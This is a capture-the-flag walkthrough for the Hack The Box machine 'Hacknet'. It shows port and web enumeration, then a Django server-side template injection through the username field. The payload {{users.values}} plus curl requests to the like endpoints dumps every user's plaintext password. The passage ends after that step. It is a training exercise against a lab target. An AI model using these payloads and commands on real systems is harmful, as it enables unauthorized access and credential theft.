Hack The Box - HTB Hacknet Writeup - Medium - Weekly - September 13th, 2025
HackTheBox - Hacknet Writeup
Machine: Hacknet
Difficulty: Medium
OS: Linux
IP: [MACHINE_IP]
Summary
Hacknet is a medium-difficulty Linux machine that showcases a Django web application with multiple vulnerabilities. The attack path involves exploiting a Server-Side Template Injection (SSTI) vulnerability combined with an Insecure Direct Object Reference (IDOR) to extract user credentials, followed by lateral movement via Django cache poisoning using Python Pickle deserialization, and finally privilege escalation through GPG-encrypted database backup analysis.
Initial Enumeration
Port Scanning
Starting with a standard nmap scan to identify open services:
nmap -sC -sV -oA nmap/hacknet [MACHINE_IP]
Web Enumeration
The target runs a web service on port 80. Add the hostname to the hosts file (writing /etc/hosts needs root, so pipe through tee rather than using a shell redirect):
echo "[MACHINE_IP] hacknet.htb" | sudo tee -a /etc/hosts
Directory and Subdomain Discovery
# Directory enumeration
feroxbuster -u http://hacknet.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js,json,txt,log -t 50 -e
# Subdomain enumeration
ffuf -u http://hacknet.htb -H "Host: FUZZ.hacknet.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -ac
Neither feroxbuster nor ffuf turned up anything beyond the application's own routes, so the attack surface is the web application itself.
Web Application Analysis
Visiting http://hacknet.htb/ reveals a login page. Using Wappalyzer, we can identify that the application is built with the Django Framework.

The application is a Django-based social media platform with the following key endpoints:
- /profile - User profile management
- /profile/edit - Username editing (the injection point for our exploit)
- /messages - User messaging
- /contacts - Contact management
- /explore - Content discovery
- /search - Search functionality
- GET /like/<POST_ID> - Toggle like state (AJAX)
- GET /likes/<POST_ID> - HTML fragment listing the users who liked a post
Initial Access - SSTI Exploitation
Vulnerability Discovery
After registering a new user account, I discovered that the application passes usernames through the Django template engine when it builds the list of post likers at /likes/<id>.
The vulnerability lies in how the likes functionality handles the username field. When a user likes a post, their username ends up in an HTML fragment like this:
<div class="likes-review-item">
<a href="/profile/<UID>">
<img src="/media/<pic>" title="<SERVER-RENDERED-CONTENT>">
</a>
</div>
The value inside the title attribute is produced by evaluating the username as a Django template rather than escaping it as data, which is a Server-Side Template Injection (SSTI). Django's template language is far more restricted than Jinja2 (no arbitrary Python, no method calls with arguments), so this is not a direct code-execution primitive; but variable lookups walk attributes and dictionary keys and invoke zero-argument callables, so any object the view puts into the render context can be traversed and dumped. Here that context includes the user QuerySet, which is all we need.
Exploitation Process
Step 1: Change username to SSTI payload
Navigate to /profile/edit and set the username to:
{{users.values}}
Step 2: Like a target post
Send a GET request to like a specific post. Note that /like/<id> toggles, so send it once; a second request would remove your like and drop your username from the fragment:
curl -s -b "sessionid=YOUR_SESSION_ID; csrftoken=YOUR_CSRF_TOKEN" \
-H "Host: hacknet.htb" \
-H "X-Requested-With: XMLHttpRequest" \
"http://hacknet.htb/like/23"
Step 3: Extract credentials
Visit /likes/23 to trigger the template injection:
curl -s -b "sessionid=YOUR_SESSION_ID; csrftoken=YOUR_CSRF_TOKEN" \
-H "Host: hacknet.htb" \
"http://hacknet.htb/likes/23"
The fragment now carries the repr of users.values() inside the title attribute: one dict per user row, including the password column in plaintext. Because Django autoescapes template output, the dump arrives HTML-entity-encoded (quotes as &#x27;, angle brackets as &lt; and &gt;), so decode it before reading or parsing the credentials.